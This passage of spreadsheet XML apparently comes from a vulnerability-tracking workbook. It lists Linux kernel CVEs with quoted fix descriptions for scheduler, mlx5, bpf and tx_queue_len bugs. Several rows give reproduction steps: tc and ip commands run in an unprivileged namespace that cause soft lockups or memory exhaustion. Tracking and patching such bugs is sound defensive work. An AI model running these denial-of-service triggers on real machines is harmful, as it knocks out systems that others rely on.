      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98009</t>
        </is>
      </c>
      <c r="D645" s="5" t="inlineStr"/>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="inlineStr"/>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr"/>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: clamp quantum in parse and fallback paths
ets_qdisc_change() falls back to psched_mtu() with no floor for bands
without an explicit quantum. With a crafted size table qdisc_pkt_len
reaches ~2 GiB, so a zero psched_mtu on a headerless device makes the
deficit-refill loop spin under the qdisc lock.
Move the floor into ets_quantum_parse() so explicitly configured quanta
are also clamped to [256, 1&lt;&lt;20], not just the fallback path.
Conditions to recreate the bug:
  CONFIG_NET_SCH_ETS=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root ets bands 3 strict 2 quanta 1 1</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98009</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98010</t>
        </is>
      </c>
      <c r="D646" s="5" t="inlineStr"/>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="inlineStr"/>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr"/>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: drr: clamp quantum in change class
drr_change_class() rejects explicit quantum==0 but falls back to
psched_mtu() with no floor. With a crafted size table qdisc_pkt_len
reaches ~2 GiB, so quantum=1 (or a zero psched_mtu on a headerless
device) makes the deficit-refill loop spin under the qdisc lock.
Add clamp_t(u32, quantum, 256, 1&lt;&lt;20) after the zero reject and on the
fallback path. The explicit-zero reject is preserved.
Conditions to recreate the bug:
  CONFIG_NET_SCH_DRR=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root drr
  tc class add dev dummy0 parent 1: classid 1:1 drr quantum 1</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98010</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98011</t>
        </is>
      </c>
      <c r="D647" s="5" t="inlineStr"/>
      <c r="E647" s="5" t="inlineStr"/>
      <c r="F647" s="5" t="inlineStr"/>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr"/>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: hhf: clamp quantum in change and init paths
hhf_change() accepts any quantum from userspace, including 1. With a
crafted size table qdisc_pkt_len reaches ~2 GiB, so quantum=1 makes
the deficit-refill loop spin ~2^31 times under the qdisc lock
(a soft lockup / denial of service).
Add max(256U, ...) in hhf_change() matching fq_codel_change(). Clamp
hhf_init() to [256, 1&lt;&lt;20] matching the siblings, and remove the old
fallback that only set quantum=256 on overflow.
Conditions to recreate the bug:
  CONFIG_NET_SCH_HHF=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root hhf
  tc qdisc change dev dummy0 root hhf quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98011</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98012</t>
        </is>
      </c>
      <c r="D648" s="5" t="inlineStr"/>
      <c r="E648" s="5" t="inlineStr"/>
      <c r="F648" s="5" t="inlineStr"/>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="inlineStr"/>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr"/>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sfq: clamp quantum in change path
sfq_change() accepts any non-negative quantum (only rejects
(int)ctl-&gt;quantum &lt; 0). With a crafted size table qdisc_pkt_len reaches
~2 GiB, so quantum=1 makes the deficit-refill loop spin ~2^31 times
under the qdisc lock (a soft lockup / denial of service).
Add max(256U, ...) matching fq_codel_change(). Reject quantum &gt; 1&lt;&lt;20
with -EINVAL, matching fq_codel_change() and the init clamp.
Conditions to recreate the bug:
  CONFIG_NET_SCH_SFQ=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root sfq
  tc qdisc change dev dummy0 root sfq quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98012</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98013</t>
        </is>
      </c>
      <c r="D649" s="5" t="inlineStr"/>
      <c r="E649" s="5" t="inlineStr"/>
      <c r="F649" s="5" t="inlineStr"/>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="inlineStr"/>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr"/>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq_pie: clamp quantum in change path
fq_pie_change() accepts any quantum value from userspace, including 1.
With a crafted size table qdisc_pkt_len reaches ~2 GiB, so quantum=1
makes the deficit-refill loop spin ~2^31 times under the qdisc lock
(a soft lockup / denial of service).
Add max(256U, ...) matching fq_codel_change().
Conditions to recreate the bug:
  CONFIG_NET_SCH_FQ_PIE=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root fq_pie
  tc qdisc change dev dummy0 root fq_pie quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98013</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98014</t>
        </is>
      </c>
      <c r="D650" s="5" t="inlineStr"/>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="inlineStr"/>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr"/>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: E-Switch, prevent mc_list repopulation during vport disable
In mlx5_esw_vport_disable(), move esw_apply_vport_rx_mode() ahead
of esw_vport_change_handle_locked() so vport-&gt;allmulti_rule is
NULL before the change handler observes it.
During FW-fatal recovery the disable runs while dev-&gt;state ==
INTERNAL_ERROR. The promisc query inside esw_update_vport_rx_mode()
fails and returns early, leaving vport-&gt;allmulti_rule intact, so
esw_update_vport_mc_promisc() runs and adds MLX5_ACTION_ADD entries
to vport-&gt;mc_list whose flow rules are then installed in the FDB
by esw_add_mc_addr(). esw_destroy_legacy_table() tears down the
FDB with those refs still held, corrupting the sub-tree and
leaving dangling flow_rule pointers in vport-&gt;mc_list.
Two-stage failure on `echo 1 &gt; /sys/bus/pci/devices/&lt;bdf&gt;/reset`:
  refcount_t: underflow; use-after-free.
   tree_put_node+0xef/0x110 [mlx5_core]
   clean_tree+0x44/0xd0 [mlx5_core] (x5)
   mlx5_fs_core_cleanup+0x57/0x1c0 [mlx5_core]
   mlx5_unload+0x65/0xd0 [mlx5_core]
   ... mlx5_health_try_recover
  BUG: unable to handle page fault for address: 0000000003000055
   down_write+0x1c/0x60
   mlx5_del_flow_rules+0x33/0x1f0 [mlx5_core]
   esw_del_mc_addr+0x7b/0x170 [mlx5_core]
   esw_apply_vport_addr_list+0x56/0xf0 [mlx5_core]
   esw_vport_change_handle_locked+0x28b/0x310 [mlx5_core]
   mlx5_esw_vport_enable+0x270/0x4a0 [mlx5_core]
   ... mlx5_load ... mlx5_health_try_recover
esw_apply_vport_rx_mode(false, false) clears vport-&gt;allmulti_rule
via its local state machine even when the FW del fails. With the
rule NULL the !IS_ERR_OR_NULL(allmulti_rule) gate in the change
handler closes, no rules are installed during disable, and the
reload starts with a clean mc_list.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98014</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98015</t>
        </is>
      </c>
      <c r="D651" s="5" t="inlineStr"/>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="inlineStr"/>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr"/>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: E-Switch: fix use-after-free in mlx5_eswitch_termtbl_put
In mlx5_eswitch_termtbl_put(), the zero-ref cleanup check reads
tt-&gt;ref_count after termtbl_mutex has been released.  Two concurrent
callers on the same mlx5_termtbl_handle race: one decrements ref_count
to zero, removes the hash entry, and calls kfree(tt) while the other
has already dropped the mutex and is about to evaluate
if (!tt-&gt;ref_count), producing a use-after-free.
Fix this by capturing the result of the decrement into a stack-local
last variable before dropping the mutex.  The cleanup decision is now
made entirely under termtbl_mutex, and tt is not touched after
kfree.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98015</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98016</t>
        </is>
      </c>
      <c r="D652" s="5" t="inlineStr"/>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="inlineStr"/>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr"/>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: Fix use-after-free race in sample_restore_put()
Concurrent teardown of TC sample rules sharing the same restore
context may re-read restore-&gt;count after dropping restore_lock.
At that point another thread may already have completed cleanup and
freed the restore object.
Use the result of the refcount decrement while holding restore_lock to
determine whether cleanup is needed.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98016</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98018</t>
        </is>
      </c>
      <c r="D653" s="5" t="inlineStr"/>
      <c r="E653" s="5" t="inlineStr"/>
      <c r="F653" s="5" t="inlineStr"/>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr"/>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mctp: i3c: serialize probe with bus removal
mctp_i3c_probe() drops busdevs_lock after finding the matching bus. A
concurrent I3C_NOTIFY_BUS_REMOVE can then unregister and free the bus
netdev before probe passes its private data to mctp_i3c_add_device().
The latter consequently adds a list node through a freed mbus pointer.
Keep busdevs_lock held until the device has been added. This also
satisfies the __must_hold annotation on mctp_i3c_add_device().</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98018</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98019</t>
        </is>
      </c>
      <c r="D654" s="5" t="inlineStr"/>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="inlineStr"/>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr">
        <is>
          <t>checkpoint</t>
        </is>
      </c>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr"/>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: mark a NULL call argument precise
check_func_arg() allows bpf_register_is_null() for nullable arguments
w/o marking the underlying scalar register precise. Hence a checkpoint
created on such a path would prune against arbitrary scalar value.
check_helper_call() enforces second parameter of the
bpf_get_local_storage() to be zero, w/o marking the underlying scalar
register precise. Hence a checkpoint created on such a path would
prune against arbitrary scalar value.
Grouping these two into one patch, as they share the same fixes tag.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98019</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98020</t>
        </is>
      </c>
      <c r="D655" s="5" t="inlineStr"/>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="inlineStr"/>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr"/>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pds_core: fix cmd_regs access racing BAR unmap on reset
pdsc_reset_prepare() and pdsc_reset_done()'s pdsc_map_bars() error path
clear/iounmap cmd_regs without devcmd_lock, and
pdsc_legacy_firmware_update()'s download loop derefs cmd_regs after
dropping and retaking the lock without re-checking. An FLR concurrent
with a devlink flash can unmap cmd_regs under an in-flight devcmd,
causing a NULL deref or a write to unmapped MMIO.
Take devcmd_lock across the BAR unmap/remap, and re-check cmd_regs in
the download loop. Only the PF maps cmd_regs and runs devcmd, so skip
the unmap on a VF, as pdsc_remove() and pdsc_reset_done() already do.
A reset that completes entirely within the unlocked window is not a
correctness problem for the image: the device clears its update session,
so a resumed download is rejected, and it verifies the staged image
before writing a flash slot, reporting PDS_RC_BAD_FW rather than
activating it.
pdsc_unmap_bars() also clears info_regs, intr_status and intr_ctrl. The
interrupt and start/stop readers of those are quiesced before the unmap
by pdsc_fw_down(), which frees the interrupts and tears down the queues.
The debugfs readers are not, since those files outlive a reset; that is
pre-existing and out of scope here.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98020</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98021</t>
        </is>
      </c>
      <c r="D656" s="5" t="inlineStr"/>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="inlineStr"/>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr"/>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: reject oversized tx_queue_len at netlink parse time
rtnl_create_link() assigns IFLA_TXQLEN directly to dev-&gt;tx_queue_len
without going through netif_change_tx_queue_len(), so a device created
with "ip link add ... txqueuelen 500000" bypasses the S16_MAX cap and
still triggers the oversized ring allocations in pfifo_fast, tun and
tap. The veth peer nest (rtnl_nla_parse_ifinfomsg()) and the
RTM_NEWLINK-on-existing-device path reach the same sinks.
Enforce the cap in ifla_policy instead: IFLA_TXQLEN becomes
NLA_POLICY_FULL_RANGE(NLA_U32, &amp;txqlen_range) with
txqlen_range = { .min = 0, .max = S16_MAX }. All netlink consumers
parse against this policy - rtnl_setlink(), rtnl_newlink() (create
and change), and the veth peer nest - so every netlink path is capped
at parse time and rejects the attribute with -ERANGE plus a proper
"integer out of range" extack message before any device state is
modified (the RTM_SETLINK half-application wart is gone with it).
Document the bound in the rt-link.yaml netlink spec.
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_VETH=y, CONFIG_USER_NS=y, CONFIG_NET_NS=y.
- Unprivileged user in a fresh user+net namespace (unshare -Urn):
  ip link add v0 txqueuelen 500000 type veth peer name v1
  -&gt; on the fixed kernel this is rejected with -ERANGE ("integer out
  of range" extack) instead of installing an oversized tx_queue_len
  that later inflates pfifo_fast/tun/tap ring allocations.
- ip link set v0 txqueuelen 500000 is likewise rejected at parse time.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98021</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98022</t>
        </is>
      </c>
      <c r="D657" s="5" t="inlineStr"/>
      <c r="E657" s="5" t="inlineStr"/>
      <c r="F657" s="5" t="inlineStr"/>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr"/>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: cap tx_queue_len at S16_MAX to prevent oversized ring allocations
Several subsystems allocate ring buffers sized by dev-&gt;tx_queue_len
with no upper bound. An unprivileged user (via unshare -Urn) can set a
huge tx_queue_len and exhaust global memory with ring allocations:
- pfifo_fast: pfifo_fast_init() and pfifo_fast_change_tx_queue_len()
  allocate 3 skb_array rings of tx_queue_len entries each.
- tun: tun_queue_resize() and the queue-attach path resize ptr_rings
  to tx_queue_len on the NETDEV_CHANGE_TX_QUEUE_LEN notifier.
- tap (macvtap/ipvtap): tap_queue_resize() and tap_init() resize/init
  ptr_rings to tx_queue_len on the same notifier.
netif_change_tx_queue_len() is the single entry point for IFLA_TXQLEN,
sysfs, and the SIOCSIFTXQLEN ioctl. Cap new_len at S16_MAX (32767)
there so the oversized value is rejected at set time. This takes
effect whether the device is up or down, before dev-&gt;tx_queue_len is
written, before any notifier fires, and before any ring is allocated.
The "&gt; S16_MAX" check also subsumes the previous unsigned-long
truncation test, and a negative ifr_qlen from the ioctl lands far
above the cap after conversion, so both old failure modes are covered
by the one comparison.
tx_queue_len is ambigious: both a per-ring sizing multiplier and a
default queue-length/limit knob for consumers that allocate
nothing at set time (pfifo/bfifo/gred/plug/sfb limits, htb
direct_qlen, qfq max_classes, teql). 32767 is chosen as the largest
value NLA_POLICY_FULL_RANGE can express for the u32 IFLA_TXQLEN
policy in patch 2/3 while staying a legitimate queue length on
high-BDP paths; the ring-memory trade-off of a shared knob is
disclosed below.
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_VETH=y, CONFIG_USER_NS=y, CONFIG_NET_NS=y.
- Unprivileged user in a fresh user+net namespace (unshare -Urn).
- pfifo_fast: create veth pairs, set tx_queue_len to 500000, attach
  mq+pfifo_fast. ~28 iterations OOMs a 2GB guest.
- tun: create 50 tun devices with IFF_MULTI_QUEUE, set tx_queue_len to
  500000, open 8 queues each. ~1.6GB of ptr_ring allocations OOMs a
  512MB guest.
- tap: same as tun with IFF_TAP. ~960MB OOMs a 512MB guest.
- On the fixed kernel the oversized tx_queue_len is rejected with
  -ERANGE at set time (all four paths: RTM_SETLINK, RTM_NEWLINK
  create, sysfs, ioctl - the latter two via this check, the former
